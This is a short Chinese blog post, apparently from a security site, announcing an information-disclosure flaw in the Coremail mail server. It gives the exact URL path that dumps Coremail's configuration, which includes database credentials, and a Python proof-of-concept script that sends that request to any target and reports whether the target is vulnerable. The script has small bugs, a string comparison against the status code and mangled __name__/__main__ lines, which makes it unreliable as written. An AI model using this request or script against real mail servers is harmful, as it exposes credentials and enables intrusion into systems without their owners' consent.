【漏洞预警】Coremail配置信息泄露漏洞

发布于 / 中文文章 / 0 条评论

hw行动爆出来的~

该漏洞可造成coremail的配置文件信息泄露,其中包括数据库连接的用户名密码等敏感信息。

测试:

Coremail地址 + /mailsms/s?func=ADMIN:appState&dumpConfig=/

poc:

import requests,sys

def mailsmsPoC(url):
    url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/"
    r = requests.get(url)
    if (r.status_code != '404') and ("/home/coremail" in r.text):
        print "mailsms is vulnerable: {0}".format(url)
    else:
        print "mailsms is safe!"


if name == 'main':
    try:
        mailsmsPoC(sys.argv[1])
    except:
        print "usage: python poc.py https://www.shungg.cn/"
转载原创文章请注明,转载自: Pikachu Hacker » 【漏洞预警】Coremail配置信息泄露漏洞
Not Comment Found